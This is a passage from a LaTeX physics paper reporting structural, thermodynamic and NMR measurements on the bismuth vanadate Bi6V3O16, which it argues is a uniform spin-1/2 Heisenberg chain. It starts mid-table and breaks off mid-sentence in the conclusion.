Bi1($4c$) & $0.2004(7)$ & $0.250$ & $0.31668(17)$ & $2.13(7)$\tabularnewline
\hline
Bi2($4c$) & $0.2519(7)$ & $0.250$ & $0.66949(17)$ & $2.08(8)$\tabularnewline
\hline
Bi3($8d$) & $0.2368(4)$ & $0.41275(14)$ & $0.83414(13)$ & $1.98(6)$\tabularnewline
\hline
Bi4($8d$) & $0.2835(5)$ & $0.42850(12)$ & $0.16763(14)$ & $2.25(6)$\tabularnewline
\hline
V1($4c$) & $0.246(3)$ & $0.250$ & $0.0331(7)$ & $4.1(3)$\tabularnewline
\hline
V2($8d$) & $0.265(2)$ & $0.3864(4)$ & $0.4874(6)$ & $3.8(2)$\tabularnewline
\hline
O1($4c$) & $-0.030(4)$ & $-0.0171(15)$ & $0.2391(15)$ & $0.5(2)$\tabularnewline
\hline
O2($8d$) & $0.127(4)$ & $0.3523(13)$ & $0.2921(11)$ & $0.5(2)$\tabularnewline
\hline
O3($8d$) & $0.010(6)$ & $0.323(2)$ & $0.7464(15)$ & $0.5(2)$\tabularnewline
\hline
O4($8d$) & $-0.018(6)$ & $0.3226(17)$ & $0.0536(10)$ & $0.5(2)$\tabularnewline
\hline
O5($4a$) & $-0.015(6)$ & $0.331(2)$ & $0.4704(9)$ & $0.5(2)$\tabularnewline
\hline
O6($8d$) & $0.287(4)$ & $0.4056(14)$ & $0.5912(10)$ & $0.5(2)$\tabularnewline
\hline
O7($8d$) & $0.207(5)$ & $0.4749(11)$ & $0.4325(10)$ & $0.5(2)$\tabularnewline
\hline
O8($8d$) & $0.316(6)$ & $0.250$ & $0.1752(16)$ & $0.5(2)$\tabularnewline
\hline
O9($8d$) & $0.178(6)$ & $0.250$ & $0.8582(15)$ & $0.5(2)$\tabularnewline
\hline
\end{tabular}
\par\end{centering}
\centering{}\caption{\label{atomic positions_alfa} Atomic coordinates and thermal
displacement parameters in the crystal structure of Bi$_{6}$V$_{3}$O$_{16}$.}
\end{table}
The thermogravimetric analysis (TGA) was carried out to heat
Bi$_{6}$V$_{3}$O$_{16}$ and to oxidize it while observing the weight change
(see Fig.~\ref{fig:TGA_heating}). After the full oxidation, Bi$_{6}$V$_{3}$O$_{16}$
(Bi$_{4}$V$_{2}$O$_{10.66}$) should transform into Bi$_{4}$V$_{2}$O$_{11}$
in which all vanadium ions are in the V$^{5+}$ oxidation state. In our experiments,
we observed three major temperature effects. The first one at $550$~K
is due to the oxygen intake, the second one at $720$~K
is due to the $\alpha\to\beta$ transition, and the last one at $860$~K i
due to the $\beta\to\gamma$ phase transition. The calculated
mass change during the phase transition at $550$~K
is $0.65\%$, which is close to what is expected
from the oxidation of Bi$_{6}$V$_{3}$O$_{16}$ to Bi$_{4}$V$_{2}$O$_{11}$
($0.5\%$).
\begin{figure}
\begin{centering}
\includegraphics[scale=0.48]{Fig4_TGA_heating}
\par\end{centering}
\caption{\label{fig:TGA_heating}Temperature dependence of the mass change
and the heat flow during heating of Bi$_{6}$V$_{3}$O$_{16}$ in
the TGA experiment.}
\end{figure}
Analysis of the V-V interaction path (see Fig.~\ref{fig:1 uniform chain structure})
reveals that two vanadium ions from crystallographic
site V$1$ (magnetic V$^{4+}$) are connected by two oxygen ions and
one vanadium from crystallographic site V$2$ (nonmagnetic V$^{5+}$).
The type of magnetic interaction between the V$^{4+}$ ions is hence
extended to superexchange (V$^{4+}$-O$^{2-}$-V$^{5+}$-O$^{2-}$-V$^{4+}$).
The V-V distances are equal along the chains. V$^{4+}$ and V$^{5+}$
ions are in the pyramidal and tetrahedral environments of oxygens,
respectively (see Fig. \ref{fig:1 uniform chain structure}).
The bond distances and bond angles along the V-V interaction
path for Bi$_{6}$V$_{3}$O$_{16}$ are listed in Tables \ref{tab3:Bond-lengths alfa}
and \ref{tab4:Bond-angles alfa}, respectively. From the structural point of view
the system resembles a $S=\frac{1}{2}$ uniform 1D Heisenberg chain.
\begin{table}
\begin{centering}
\begin{tabular}{|c|c|c|}
\hline
Bonds & Description & Value (\AA)\tabularnewline
\hline
\hline
V$1$-O$5$ & intrachain & 1.92\tabularnewline
\hline
O$5$-V$2$ & intrachain & $1.82$\tabularnewline
\hline
V$2$-O$4$ & intrachain & $1.73$\tabularnewline
\hline
O$4$-V$1$ & intrachain & $1.94$\tabularnewline
\hline
\end{tabular}
\par\end{centering}
\centering{}\caption{\label{tab3:Bond-lengths alfa}Bond lengths between various vanadium-oxygen
linkages along the $a$ direction of the 1D chain in Bi$_{6}$V$_{3}$O$_{16}$ }
\end{table}
\begin{table}
\begin{centering}
\begin{tabular}{|c|c|c|}
\hline
Angles & Description & Value (deg)\tabularnewline
\hline
\hline
V$1$-O$5$-V$2$ & intrachain & 163.97\tabularnewline
\hline
O$5$-V$2$-O$4$ & intrachain & 101.07\tabularnewline
\hline
V$2$-O$4$-V$1$ & intrachain & 150.15\tabularnewline
\hline
\end{tabular}
\par\end{centering}
\caption{\label{tab4:Bond-angles alfa}Bond angles between various vanadium-oxygen
linkages in Bi$_{6}$V$_{3}$O$_{16}$ }
\end{table}
Recent reports\cite{BiV2O5_Oct 2015_paper} on the crystallographic
data for the similar compounds Bi$_{4}$V$_{2}$O$_{10.2}$ and Bi$_{3.6}$V$_{2}$O$_{10}$
document that V$^{4+}$ ions occupy the V$1$ site, and V$^{5+}$
ions are placed on the V$2$ sites. Bi$_{6}$V$_{3}$O$_{16}$
is derived from the same Aurivillius family, having a similar composition and preparation route.
Here as well, V$^{4+}$ ions and V$^{5+}$ ions occupy the V$1$ and V$2$
sites, respectively.
The field (up to 14~T) and temperature ($2~\lyxmathsym{\textendash}~300$~K) dependence
of the heat capacity and
magnetization $M$ were measured using the
heat capacity and vibrating-sample magnetometer options of a Quantum Design physical
property peasurement system, respectively.
The magic angle spinning nuclear magnetic resonance (MAS-NMR) measurements
(spectra and nuclear spin-lattice relaxation times $T_{1}$) were carried out on vanadium
nuclei ($^{51}$V gyromagnetic ratio $\lyxmathsym{\textgreek{g}}/2\lyxmathsym{\textgreek{p}}=11.1921$
MHz T$^{\lyxmathsym{\textminus}1}$ and nuclear spin $I=7/2$) in a fixed field of the $4.7$-T magnet
using an AVANCE-II Bruker spectrometer. The spinning speed of the $1.8$-mm o.d. rotor
was varied between $20$ and $30$~kHz.\cite{MAS-NMR reference}
Typical pulse widths were varied from $4$ to $2$ $\mu$s. In echo
sequence $\lyxmathsym{\textgreek{p}}/2\lyxmathsym{\textminus\textgreek{t}\textminus\textgreek{p}}$,
a rotation period between the excitation and refocusing
pulses was needed, \textgreek{t}. By measuring NMR using this technique, the nuclear dipole-dipole
interactions and chemical shift anisotropy are averaged
out, and the quadrupolar interaction is partially averaged out. Thus,
MAS-NMR gives finer details about the spectra. For $T_{1}$,
the speed of the rotor was $30$~kHz, and the measurements were undertaken
at the frequency of the isotropic shift at a given temperature.
$T_{1}$ was measured by the saturation recovery method using a saturation
comb of fifty $\pi$/2 pulses followed by variable delay and an echo sequence
for recording the intensity. For the lowest temperatures, $T_{1}$ measurements were performed in
static conditions to explore the low-temperature behavior down to $4$~K. The frequency
shifts are given relative to the VOCl$_3$ reference.
\section{Results and Discussion}
\subsection{Magnetic susceptibility}
\begin{figure}
\begin{centering}
\includegraphics[scale=0.49]{Fig5_Magn_Susc}
\par\end{centering}
\caption{\label{fig:5_CW_Fit}The temperature dependence of the susceptibility
$\chi = M/H$ at $H = 4.7$~T for Bi$_{6}$V$_{3}$O$_{16}$.
Black open circles are $\chi~-~\chi_{0}$ data, the green line
is the low-$T$ Curie-Weiss contribution and the blue solid diamonds show
$\chi~-~\chi_{0}~-~\chi_{Curie}$.
The region of short-range magnetic ordering is indicated by the red arrow.
The red line shows the high-$T$ Curie-Weiss fit in the temperature range of
$190~\lyxmathsym{\textendash}~300$~K.
The inset shows the variation of the position of maximum in the magnetic
susceptibility curves with the change in applied field.}
\end{figure}
Magnetic susceptibility $\chi = M/H$ measurements were carried out in 0.05~-~14-T
applied magnetic fields. With decreasing temperature, $\chi$ follows the
Curie-Weiss law and shows a broad maximum around $50$~K, which indicates the presence of
short-range magnetic ordering in the system. A Curie-like upturn is
observed at lower temperatures, possibly arising from paramagnetic
impurities. From the Curie-Weiss fit, $\chi(T)=\chi_{0}+C/(T-\theta_{CW})$
in the $T$ range $190-300$ K (see Fig. \ref{fig:5_CW_Fit}),
the $T$-independent $\chi_{0}=8.6\times10^{-6}$
cm$^{3}$/(mole~V$^{4+}$), the Curie constant $C=0.4$ cm$^{3}$K/(mole~V$^{4+}$), and
the Curie-Weiss temperature\ \ $\theta_{CW}$=$-60$~K can be extracted. The negative
value of $\theta_{CW}$ indicates that the dominant exchange couplings
between V$^{4+}$ ions are AFM. We also measured the
electron spin resonance spectrum of the powder ($X$ band,
room temperature; not shown) and found typical g-values for a V$^{4+}$ ion [($g_x, g_y, g_z$)= (1.93, 1.91, 1.8)] with tiny anisotropy.
From our $\chi$ measurements in Bi$_{6}$V$_{3}$O$_{16}$,
the value of the Curie constant ($C=0.135$ cm$^{3}$K/mole) is $36\%$
of the expected value ($C=0.375$ cm$^{3}$K/mole) for a full $S=1/2$
moment which indicates that only about $1/3$ of the vanadium ions
are magnetic, i.e., in the V$^{4+}$ oxidation state. Earlier
reports~\cite{Ref.19_magnetic measurement-BiV2O5_2013,BiV2O5_Oct 2015_paper}
on similar systems (Bi$_{4}$V$_{2}$O$_{10.2}$ and Bi$_{3.6}$V$_{2}$O$_{10}$)
suggested that V$^{4+}$ and V$^{5+}$ ions prefer the V$1$ and V$2$
sites respectively, namely $90\%$ of the V$1$ site is
occupied by V$^{4+}$ and the rest is filled by the nonmagnetic V$^{5+}$,
meaning that V$1$ site is shared by the mixed
valences. From the bulk measurements,
we have not acquired any evidence of the existence of site sharing
in Bi$_{6}$V$_{3}$O$_{16}$.
From the $\chi(T)$ results, the Van Vleck susceptibility
$\chi_{VV}=\chi_{0}-\chi_{core}=12.4\times10^{-5}$cm$^{3}$/mole,
where $\chi_{core}$ is the core diamagnetic susceptibility, was
calculated with a value of $-11.52\times10^{-5}$cm$^{3}$/mole f. u. (here we
consider the formula unit to be Bi$_{2}$VO$_{5.33}$). The low-temperature
upturn in $\chi(T)$ below $20$ K is attributed to the orphan spins
and other extrinsic magnetic impurities.~\cite{Lebernegg2017}
To extract the exact magnetic susceptibility, the temperature-independent
susceptibility (Van Vleck plus the core diamagnetic susceptibility)
and the Curie contribution originating from the extrinsic paramagnetic
impurities and/or orphan spins were subtracted from the experimentally
obtained magnetic susceptibility data (see Fig. \ref{fig:5_CW_Fit}).
The low-temperature Curie-Weiss fit gives $C~=~0.022$~cm$^{3}$K/mole,
$\theta_{CW}$~=~$10.3$~K. From the value of $C$ we find that this contribution is about 6\%
of an ideal $S=\frac{1}{2}$ system. After subtracting this,
we find that the magnetic susceptibility saturates to a fixed value as $T$ tends
towards zero, which is expected for a gapless $S=\frac{1}{2}$ uniform chain.
However, to model the susceptibility with the uniform $S=\frac{1}{2}$ Heisenberg chain,
we rely on the MAS-NMR data below, where the spin susceptibility is
manifested in a more pristine manner.
\begin{figure}
\begin{centering}
\includegraphics[scale=0.32]{Fig6_spin_chain_fit_without_gap}
\par\end{centering}
\caption{\label{fig:6 Mvs H}The experimental magnetization data of Bi$_{6}$V$_{3}$O$_{16}$
vs applied magnetic field at 1.8~K. }
\end{figure}
We have not observed any signature of hysteresis in the $M$ vs $H$ measurements.
The broad maximum observed in our system greatly resembles
what was observed in similar Bi-V-O complexes reported previously.\cite{BiV2O5_Oct 2015_paper,Ref.19_magnetic measurement-BiV2O5_2013}
With the increase in the applied field, we observe that the broad maximum
shifts towards lower temperatures (see the inset of Fig.~\ref{fig:5_CW_Fit}).
In the applied field $H$ dependence of magnetization $M$
(see Fig.~\ref{fig:6 Mvs H}), we have not found any anomaly
or steps indicating the presence of any gap, and the
data agree well with the phenomenological expression
$M^{\text{chain}}(H) = \alpha H + \beta\sqrt{H}$,
with $\alpha$= 1.3$\times10^{-7}$, and $\beta$ = 1.65$\times10^{-5}$.
\subsection{Heat capacity}
In the temperature dependence of heat capacity $C_{p}$, we did not detect
any long range magnetic ordering (Fig.\ref{fig:7_heat capacity}).
In the plot of $C_{p}/T$ vs. $T$, the broad maximum at around $55$ K is observed,
which does not shift under the application of external
magnetic field up to $9$ T. The magnetic specific heat $C_{m}$ was extracted
by subtracting the lattice contribution using a combination
of Debye and Einstein heat capacities, $C_{Debye}$ and $C_{Einstein}$,
respectively:
$C_{Debye}=\ensuremath{C_{d}\times9nR}\ensuremath{(T/\theta_{\text{d}})^{\mbox{\text{3}}}}\ensuremath{\int_{\text{0}}^{\text{\ensuremath{\theta\ensuremath{_{\text{d}}}/T}}}[x^{\text{4}}e^{\text{\ensuremath{x}}}/(e^{\text{\ensuremath{x}}}-1)^{\text{2}}}\ensuremath{]dx}$,
$C_{Einstein}=\ensuremath{3nR[\sum C{}_{e_{m}}\frac{x_{E_{m}}^{2}e^{x_{E_{m}}}}{(e^{x_{E_{m}}}-1)^{2}}]}$,
$x=\frac{h\omega_{E}}{k_{B}T}$.
In the above formula, $n$ is the number of atoms in the primitive
cell, $k_{\text{B}}$ is the Boltzmann constant, $\theta_{\text{d}}$
is the relevant Debye temperature, and $m$ is an index for an optical
mode of vibration. In the Debye-Einstein model the total number of
modes of vibration (acoustic plus optical) is equal to the total number
of atoms in the formula unit. In this model we considered the
ratio of the relative weights of acoustic modes and the sum of the different
optical modes to be $1:n-1$.
We used a single Debye and multiple (three) Einstein functions
with the coefficient $C_{d}$ for the relative weight of the acoustic modes of
vibration and coefficients
$C_{e_{1}}$, $C_{e_{2}}$, and $C_{e_{3}}$ for the relative weights
of the optical modes of vibration.
The experimental data of the system were fitted by excluding the low-temperature
region of $2-115$ K assuming that most of the magnetic part of the
heat capacity is confined within this temperature range.
The fit of our experimental data
to such a combination of Debye and Einstein heat capacities
yields a Debye temperature of $96$~K and Einstein temperatures of
$130$, $295$, and $584$~K with relative weights of $C_{d}$
:$C_{e_{1}}$:$C_{e_{2}}$:$C_{e_{3}}$ = $13:14:48:25$.
\begin{figure}
\begin{centering}
\includegraphics[scale=0.59]{Fig7_heat_capacity}
\par\end{centering}
\caption{\label{fig:7_heat capacity}The temperature dependence of specific
heat of Bi$_{6}$V$_{3}$O$_{16}$
in zero magnetic field; the
blue points are the fit described in the text, and the red line is its
extrapolation. The top inset displays the $C_{p}/T$ vs T plot
at $0$ T (black solid circles) and $9$ T (red open diamonds) magnetic
fields, respectively.
The bottom inset shows the magnetic contribution to the heat capacity (black
open circles). The magenta line is the magnetic heat capacity contribution
for the 1D uniform Heisenberg chain; the green data points (right axis) show the change
in entropy $\Delta S$ with $T$. }
\end{figure}
The electronic contribution to the
total heat capacity was neglected since the compound possesses an
insulating ground state. Upon subtracting
the lattice heat capacity with the above parameters, we obtain the
magnetic contribution to the heat capacity $C_{m}(T)$, which, accordingly,
shows a broad maximum around $50$ K. The entropy
change $\lyxmathsym{\textgreek{D}}$$S$ was calculated by integrating
the $C_{m}/T$ data (see bottom inset in Fig.~\ref{fig:7_heat capacity}). The entropy
change is about $5.36$~J K$^{\mbox{\textminus}1}$ (calculated for
1 mole), which is close to the expected value of a $S=\frac{1}{2}$ system
($R$ ln 2 = $5.73$~J/mole~K). Although the observance of the broad maximum
in the $C_{m}$ vs $T$ data indicates the 1D magnetic interaction
in the system, in the temperature regime
below $30$~K, the magnetic heat capacity is less than 1 \%
of the lattice contribution, which makes the analysis of the magnetic
contribution in this regime highly dependent on the model.
We have also compared $C_{m}$ with the 1D Heisenberg chain
model~\cite{Alternating chain expression paper_Johnston}
(see the magenta line in bottom inset in Fig.~\ref{fig:7_heat capacity}).
The mismatch between our calculated $C_{m}$ and the fit is not surprising
as we know that an accurate estimation of $C_{m}$ is nearly impossible
at this temperature range as the phonon contribution (lattice part) consists
of nearly 99\% of the heat capacity around the peak of $C_{m}$ at such a relatively high temperature.
The main findings from our heat capacity results are that we did not observe
any magnetic long-range ordering in our system and $C_{m}$ shows the same
trend observed in $\chi$ vs $T$ data. Both these results support the
low-dimensional magnetic behavior in Bi$_{6}$V$_{3}$O$_{16}$.
\subsection{NMR}
\subsubsection{Room-temperature magic angle spinning NMR}
NMR is a powerful local probe to extract the static and dynamic properties
of a spin system and has been extensively used on vanadia systems.~\cite{Volkova}
Fortunately, the room-temperature $^{51}$V MAS-NMR spectrum for Bi$_{6}$V$_{3}$O$_{16}$
is known, consisting of a single line shifted to -1447 ppm at room temperature (with sample spinning
speeds up to 17~kHz).~\cite{Delmaire} In our MAS spectra, we
observed also only one $^{51}$V line at -1382 ppm (spinning
at 30 kHz; see the uppermost spectrum in Fig.~\ref{fig:8_MASNMR_spectra}
and the top spectrum of Fig.~\ref{fig:9 Bi4V2O11 NMR}) confirming
that the $^{51}$V NMR signal originates entirely and from only one of the
two available vanadium sites in this system.~\cite{comment1}
As the spectral resolution is much better in the $^{51}$V MAS-NMR
compared to any bulk measurement or even to the static NMR data, having
a single strongly shifted sharp NMR line validates the structure of
Bi$_{6}$V$_{3}$O$_{16}$ here very strongly.
\begin{figure}
\begin{raggedright}
\includegraphics[scale=0.52]{Fig8_MASNMR_comparison}
\par\end{raggedright}
\caption{\label{fig:8_MASNMR_spectra}$^{51}$V MAS-NMR spectra of Bi$_{6}$V$_{3}$O$_{16}$ measured at different temperatures in 4.7-T fixed magnetic field. The main line at the isotropic value of the magnetic shift is highlighted in red, and the rest of the peaks are spinning sidebands at multiples of the spinning frequency (30 kHz) apart from the main line.}
\end{figure}
We have also performed room-temperature MAS-NMR measurements on Bi$_{4}$V$_{2}$O$_{11}$,
the nonmagnetic parent compound of the BiMeVOX family, and compared the
$^{51}$V NMR signals of these two compounds under the same experimental
conditions (Fig.~\ref{fig:9 Bi4V2O11 NMR}). For Bi$_{4}$V$_{2}$O$_{11}$, the $^{51}$V MAS-NMR line
positions are also documented~\cite{Hardcastle,KimGray}, and
our results agree well with the literature. MAS-NMR results published
by Delmaire \textit{et~al.}\cite{Delmaire} showed the detection of four
(three major) structurally different V$^{5+}$ environments
The MAS-NMR results of Kim and Grey showed the detection of three
different vanadiums.\cite{KimGray}
Based on the crystal structure analysis of Mairesse\textit{ et~al.}\cite{structural analysis of Bi4V2O11}
and NMR studies of Kim and Grey \cite{KimGray} we can assign the
peak at -423~ppm to the tetrahedral V$^{5+}$ (the V1 site according to the description of
Ref.~\onlinecite{structural analysis of Bi4V2O11}), the peak at -509~ppm to V$^{5+}$
in the trigonal bipyramidal environment (V2), and peaks at -491 and -497~ppm to
the two different fivefold V$^{5+}$ environments. These last two are V3a and V3b according to the report by Mairesse \textit{ et~al.};\cite{structural analysis of Bi4V2O11} however, we cannot differentiate
which one is V3a and which is V3b in our spectrum. The remaining lines with lower intensities are possibly due to the V$^{5+}$ ions close to the ends of chains and from the $6a_{m}$ superstructure which was detected at
low level in the XRD data of Ref.~\onlinecite{structural analysis of Bi4V2O11}.
The chemical shift, the width, and relative intensity of these components
are given in Table~\ref{tab:4Bi4V2O11 components}.
\begin{figure}
\begin{centering}
\includegraphics[scale=0.8]{Fig9_MASNMR_multiple_lines}
\par\end{centering}
\caption{\label{fig:9 Bi4V2O11 NMR} The top spectrum is the zoomed part of
the central peak of the room-temperature ($305$ K) $^{51}$V NMR
spectrum of Bi$_{6}$V$_{3}$O$_{16}$.
The bottom spectrum is the $^{51}$V
MAS-NMR spectrum of Bi$_{4}$V$_{2}$O$_{11}$. The black line is the
experimental spectrum, which can be well fitted by several Lorentzian
lines, as given by green lines; the red line is the sum of the components.
The spectra were recorded on an AVANCE-III-800 spectrometer at $^{51}$V
resonance frequency of $210.5$ MHz, using a home-built MAS probe for
$1.3$-mm rotors, at $50.1$-kHz sample spinning speed.}
\end{figure}
The determined aspects further validate that in the
case of Bi$_{6}$V$_{3}$O$_{16}$, the possibility of V$^{4+}$
ions occupying two different sites is clearly ruled out, as this would
lead to the creation of different environments of V$^{5+}$ ions and,
consequently, different NMR lines which should get
detected in MAS-NMR experiments. However, due to a strong,
large hyperfine field on V$^{4+}$ ions, the NMR signal originating
from the magnetic vanadium ions could not be detected at elevated
temperatures. A similar scenario was observed in many
other systems such as Cs$_{2}$CuCl$_{4}$,\cite{Cs2CuCl4} BaCuSi$_{2}$O$_{6}$,
\cite{Jaime04,Kramer07,Kramer13} SrCu$_{2}$(BO$_{3}$)$_{2}$,\cite{Kageyama99,Kodama02}
BaV$_{3}$O$_{8}$,\cite{BaV3O8} and Li$_{2}$ZnV$_{3}$O$_{8}$.\cite{Li2ZnV3O8}
The example of BaV$_{3}$O$_{8}$ is most relevant in this context
because BaV$_{3}$O$_{8}$ is also a 1D chain system where the
signal from the magnetic V$^{4+}$ ions was not detected, while the
signal from the nonmagnetic V$^{5+}$ was observed.\cite{BaV3O8}
\begin{table}
\begin{centering}
\begin{tabular}{|c|c|c|c|}
\hline
& Frequency& FWHM&Relative\\&shift (ppm) &(ppm)&intensity (\%)\tabularnewline
\hline
\hline
Peak 1 & $-423$ & $10$ & $15$\tabularnewline
\hline
Peak 2 & $-509$ & $9$ & $29$\tabularnewline
\hline
Peak 3 & $-491$ & $8$ & $11$\tabularnewline
\hline
Peak 4 & $-438$ & $16$ & $8$\tabularnewline
\hline
Peak 5 & $-407$ & $12$ & $2$\tabularnewline
\hline
Peak 6 & $-464$ & $23$ & $8$\tabularnewline
\hline
Peak 7 & $-536$ & $23$ & $4$\tabularnewline
\hline
Peak 8 & $-497$ & $15$ & $23$\tabularnewline
\hline
\end{tabular}
\par\end{centering}
\caption{\label{tab:4Bi4V2O11 components}The chemical shift, the width, and
relative intensity of different vanadium lines in Bi$_{4}$V$_{2}$O$_{11}$spectra. }
\end{table}
\subsubsection{Low-temperature, cryoMAS NMR}
The temperature dependence of $^{51}$V spectra of Bi$_{6}$V$_{3}$O$_{16}$
measured using cryogenic MAS (cryoMAS) technique~\cite{MAS-NMR reference} is shown in
Fig.~\ref{fig:8_MASNMR_spectra}.
Here, we are limited to remain above $T=$ $20$~K to maintain the
fast sample spinning, but the obtained values of the isotropic
Knight shift $K$ up to room temperature
are very accurately determined, and they follow the same trend
observed in $\chi(T)$. In the temperature
dependence of $K$, a broad maximum at around $50$ K
is observed, similar to the $\chi(T)$ data, indicating low-dimensional,
short-range magnetic ordering
As $K(T)$ is a direct measure of spin susceptibility, the following equation can
be written:
\begin{equation}
K(T)=K_{0}+\frac{A_{hf}}{N_{A}\mu_{B}}\chi_{spin}(T)\label{eq:2}~,
\end{equation}
where $K_{0}$ is the temperature-independent chemical shift, $A_{hf}$
is the hyperfine coupling constant, and $N_{A}$ is Avogadro's
number. As long as $A_{hf}$ is constant, $K(T)$ should follow $\chi_{spin}(T)$.
We estimated the exchange couplings by fitting the $K(T)$ data with
Eq.(~\ref{eq:2}). Here, $\chi_{spin}$ is the expression for the spin susceptibility
of the $S=\frac{1}{2}$ chain model given by
Johnston \textit{et~al.}\cite{Alternating chain expression paper_Johnston}\textit{
} which is valid in the whole temperature range of our experiment from
$2$ to $300$~K and also in the whole limit of $0\leqslant\alpha\leqslant1$.
The $K(T)$ data for Bi$_{6}$V$_{3}$O$_{16}$ agree well with the
$S=\frac{1}{2}$ chain model with $K_{0}\simeq-370$~ppm, $A_{hf}=5.64$ KOe/$\mu_{B}$
with an exchange coupling $J_{1}/k_{B}=113(5)$ K, and the alternation
ratio $\alpha=1$ (uniform chain) and $\alpha=0.995$ (alternating
chain; Fig.~\ref{fig:10_MASNMR_K_T}).
For the alternation ratio of $\alpha=0.95$,
the zero-field spin gap between the singlet and triplet states according
to the $S=\frac{1}{2}$ alternating chain model is $\Delta/k_{B}\simeq9.52$
K according to Johnston \textit{et~al.}\cite{Alternating chain expression paper_Johnston}\textit{
} and $10.35$ K according to Barnes \textit{et~al.},\cite{spin gap in alternating spin chain}\textit{
} depending on the method of approximation. Our $M$ vs $H$ results up to $14$~T
(see Fig.~\ref{fig:6 Mvs H}) did not show any signature of closing
of the spin gap near the respective magnetic fields, which prompts us to consider
that uniform chain is the correct model indeed.
It is insightful to compare our results with the recently investigated uniform chain compound
(NO)[Cu(NO$_3$)$_3$] with intrachain coupling $J~=~142(3)$\,K and
long-range magnetic order taking place only at $T_N~=~0.58(1)$\,K, resulting in a ratio of
suppression represented by $f~=~|J|/T_N~=~245(10)$.~\cite{NOCu(NO3)3-1,NOCu(NO3)3-2,NOCu(NO3)3-3}
Even more recently, a study on Cs$_4$CuSb$_2$Cl$_{12}$ reported $J~=~186(2)$\,K and
a superconductorlike phase transition taking place only at $T_{sp}~=~0.70(1)$\,K, resulting in a ratio of
suppression represented by $f~=~|J|/T_{sp}~=~270(7)$.~\cite{Tran2019}
KCuF$_3$ has a relatively large interchain coupling ($J'/J\approx0.01$), yielding
$f~=~390$~K$/39$~K$~=~10$;\cite{Lake2005}\ Sr$_2$CuO$_3$, with a tiny interchain
interaction ($J'/J\approx10^{-5}$), gives $f~=~2200$~K$/5$~K$~=~440$.\cite{SrCu2O3}
For Bi$_{6}$V$_{3}$O$_{16}$ the lowest estimate would be $f~=~108$~K$/2$~K$~\approx~55$,
suggesting that the interchain exchange interactions here are very weak and/or frustrated.
\begin{figure}
\begin{centering}
\includegraphics[scale=0.38]{Fig10_MASNMR_K_T}
\par\end{centering}
\caption{\label{fig:10_MASNMR_K_T}Temperature dependence of the $^{51}$V NMR
shift $K$ of Bi$_{6}$V$_{3}$O$_{16}
(shown by black
circles) measured using the cryoMAS technique. The black and green lines are the fittings with
the susceptibility model using Eq.(~\ref{eq:2}) for a $S=\frac{1}{2}$ uniform
chain ($\alpha=1$) and for an alternating chain ($\alpha=0.995$), respectively.
The inset shows the $^{51}$V MAS-NMR shift $K$ of Bi$_{6}$V$_{3}$O$_{16}$
vs $\chi-\chi_{0}-\chi_{Curie}$, where both $\chi(T)$ and $K$ are measured at
$4.7$~T, with temperature being an implicit parameter. The solid line
is the linear fit.}
\end{figure}
The $K$ vs $\chi(T)$ plot is shown in the inset of Fig.~\ref{fig:10_MASNMR_K_T},
where $K$ is measured shift in percent and $\chi-\chi_{0}-\chi_{Curie}$
is magnetic susceptibility without the $T$-independent and Curie impurity contributions.
The magnetic susceptibility was measured in the same magnetic field of $4.7$~T in
which the NMR measurements were performed.
\subsubsection{Spin lattice relaxation rate $1/T_{1}$}
To study microscopic properties of 1D Heisenberg antiferromagnets (HAF), it is necessary
to measure the temperature dependence of the spin lattice relaxation rate
$1/T_{1}$, which gives information about the imaginary part of the
dynamic susceptibility $\chi(q,\omega)$. As vanadium is a $I=7/2$
nucleus and to avoid further broadening due to dipole-dipole interaction
we studied the temperature dependence of $1/T_{1}$ in the rotating
conditions. The temperature dependence of $^{51}$V $1/T_{1}$ is presented
in Fig.~\ref{fig:11_T1}. In the whole temperature range from $300$
down to $20$~K, the recovery of nuclear magnetization is single exponential.
We have not observed any indication of divergence of the relaxation
rate, revealing the absence of any magnetic ordering. Also, no
sign of activated behavior was observed, which proves that
down to $20$~K no dimerization takes place. Until about $100$ K,
$1/T_{1}$ drops linearly with temperature. However, below 100~K deviations
from the linear behavior are observed.
Additionally, $1/KT_{1}T$ is temperature independent at $100$~K~$\leq~T~\leq~300$~K,
and it shows linear behavior with $T$ below $100$~K.
\begin{figure}
\begin{centering}
\includegraphics[scale=0.54]{Fig11_T1-inv}
\par\end{centering}
\caption{\label{fig:11_T1}Temperature dependence of the spin-lattice relaxation
rate ($1/T_{1}$) of Bi$_{6}$V$_{3}$O$_{16}$. \
In the top inset the same plot is shown with temperature in the log scale and low-$T$
data measured on a static sample (red diamonds). The bottom
inset shows the plot of $1/KT_{1}$T vs $T$.}
\end{figure}
We did not observe any signatures of magnetic ordering, and also no
features of spin gap are observed in the temperature dependence of $1/T_{1}$.
Generally, $1/T_{1}$ depends on both uniform $(q=0)$ and staggered
spin fluctuations $(q=\pm\pi/a)$. The uniform component leads to
$1/T_{1\:}\sim\: T$, while the staggered component gives $1/T_{1}$$=$
const.\cite{spin fluctuations-Sachdev} The deviation from the linear behavior
of $1/T_{1}$ below $100$ K presumably indicates that the temperature-independent
part is coming into play which was otherwise absent in the temperature
region above $100$ K. This fact is also reflected in the $1/KT_{1}T$
vs $T$ plot as $1/KT_{1}T$ is expected to be constant when the ($q=0)$
contribution dominates. In our $1/KT_{1}$T plot, we observe a clear drop
from the high-$T$ constant value for temperatures $\leq$100 K.
To observe the temperature dependence of $1/T_{1}$ at lower temperatures, we
stopped spinning and performed NMR measurements on the broad line
in static conditions; $1/T_{1}$ below $15$~K is essentially $T$ independent.
The absolute value of the relaxation rate at low $T$ is much larger than in
cryoMAS-NMR, which seems to indicate that
in the static $T_{1}$ measurements we have started to detect the magnetic
V$^{4+}$ at low temperatures with a very short relaxation
(see the top inset in Fig.~\ref{fig:11_T1}). Note that $1/T_{1}$
becoming constant at low temperatures is expected for $S=\frac{1}{2}$ 1D
HAF systems.~\cite{Barzykin} Similar spin-lattice
relaxation behavior has been observed in the uniform $S=\frac{1}{2}$ 1D
chain Ba$_{2}$Cu(PO$_{4}$)$_{2}$.\cite{Ba2Cu(PO4)2-NMR-T1}
\section{Conclusion and Outlook}
We have reported bulk thermodynamic and local NMR studies of the $S=\frac{1}{2}$ V-based
compound Bi$_{6}$V$_{3}$O$_{16}$. All of the measurements
confirm the presence of low dimensionality in this material.
Upon subtracting the low-temperature Curie-Weiss contribution, the magnetic
spin susceptibility agrees well with the $S=\frac{1}{2}$ uniform Heisenberg chain model.
The magnetic heat
capacity also confirms the existence of low-dimensional magnetism
in the system, even though the lattice part has a dominant
contribution to the total heat capacity, and approximation by any
model is not decisive. In the MAS-NMR experiments on Bi$_{6}$V$_{3}$O$_{16}$,
we observed a single sharp line which confirms that there is no site
